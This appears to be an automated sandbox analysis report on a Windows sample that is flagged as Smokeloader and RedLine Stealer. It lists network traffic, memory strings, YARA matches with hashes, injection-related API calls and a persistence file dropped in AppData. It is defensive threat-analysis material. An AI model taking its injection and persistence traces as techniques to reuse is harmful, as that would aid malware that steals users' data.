Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:04:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:04:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:04:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:05:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:05:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:05:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:05:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:05:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:05:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:05:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:05:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:05:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:06:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:06:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:06:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:06:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:06:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: explorer.exe, 00000002.00000000.2237496899.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2237496899.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: explorer.exe, 00000002.00000000.2237496899.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2237496899.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: explorer.exe, 00000002.00000000.2237496899.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2237496899.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: explorer.exe, 00000002.00000000.2237496899.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2237496899.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: explorer.exe, 00000002.00000000.2237496899.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
      Source: explorer.exe, 00000002.00000000.2234479094.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2231041832.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2234452297.0000000007B50000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: explorer.exe, 00000002.00000000.2242095283.000000000C3FD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: explorer.exe, 00000002.00000000.2238006366.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
      Source: explorer.exe, 00000002.00000000.2242095283.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000002.00000000.2237496899.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 00000002.00000000.2237496899.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/I
      Source: explorer.exe, 00000002.00000000.2237496899.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000002.00000000.2237496899.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2237496899.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
      Source: explorer.exe, 00000002.00000000.2237496899.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
      Source: explorer.exe, 00000002.00000000.2242095283.000000000C070000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com-
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
      Source: explorer.exe, 00000002.00000000.2242095283.000000000C070000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.come
      Source: explorer.exe, 00000002.00000000.2242095283.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEMd
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000002.00000000.2238006366.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/e
      Source: explorer.exe, 00000002.00000000.2242095283.000000000C070000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comM
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Source: Yara matchFile source: 00000004.00000002.2509117152.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2253666122.0000000004A91000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2509592030.00000000047A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2253580579.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Source: 00000004.00000002.2509060579.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000004.00000002.2509117152.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000004.00000002.2509007784.0000000002C0D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.2253666122.0000000004A91000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000004.00000002.2509592030.00000000047A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.2253380086.0000000002C1D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.2253563669.0000000004790000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000002.2253580579.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
      Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401514
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,0_2_00402F97
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401542
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,0_2_00403247
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401549
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,0_2_0040324F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,0_2_00403256
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401557
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,0_2_0040326C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040327D NtTerminateProcess,GetModuleHandleA,0_2_0040327D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014FE
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,0_2_00403290
      Source: C:\Users\user\AppData\Roaming\fbtdajhCode function: 4_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401514
      Source: C:\Users\user\AppData\Roaming\fbtdajhCode function: 4_2_00402F97 RtlCreateUserThread,NtTerminateProcess,4_2_00402F97
      Source: C:\Users\user\AppData\Roaming\fbtdajhCode function: 4_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401542
      Source: C:\Users\user\AppData\Roaming\fbtdajhCode function: 4_2_00403247 NtTerminateProcess,GetModuleHandleA,4_2_00403247
      Source: C:\Users\user\AppData\Roaming\fbtdajhCode function: 4_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401549
      Source: C:\Users\user\AppData\Roaming\fbtdajhCode function: 4_2_0040324F NtTerminateProcess,GetModuleHandleA,4_2_0040324F
      Source: C:\Users\user\AppData\Roaming\fbtdajhCode function: 4_2_00403256 NtTerminateProcess,GetModuleHandleA,4_2_00403256
      Source: C:\Users\user\AppData\Roaming\fbtdajhCode function: 4_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401557
      Source: C:\Users\user\AppData\Roaming\fbtdajhCode function: 4_2_0040326C NtTerminateProcess,GetModuleHandleA,4_2_0040326C
      Source: C:\Users\user\AppData\Roaming\fbtdajhCode function: 4_2_0040327D NtTerminateProcess,GetModuleHandleA,4_2_0040327D
      Source: C:\Users\user\AppData\Roaming\fbtdajhCode function: 4_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014FE
      Source: C:\Users\user\AppData\Roaming\fbtdajhCode function: 4_2_00403290 NtTerminateProcess,GetModuleHandleA,4_2_00403290
      Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000004.00000002.2509060579.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000004.00000002.2509117152.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000004.00000002.2509007784.0000000002C0D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.2253666122.0000000004A91000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000004.00000002.2509592030.00000000047A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.2253380086.0000000002C1D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.2253563669.0000000004790000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000002.2253580579.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: fbtdajh.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.troj.evad.winEXE@2/2@7/2
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C200B4 CreateToolhelp32Snapshot,Module32First,0_2_02C200B4
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\fbtdajhJump to behavior
      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: file.exeReversingLabs: Detection: 42%
      Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\fbtdajh C:\Users\user\AppData\Roaming\fbtdajh
      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\fbtdajhSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\fbtdajhSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\fbtdajhSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Data Obfuscation

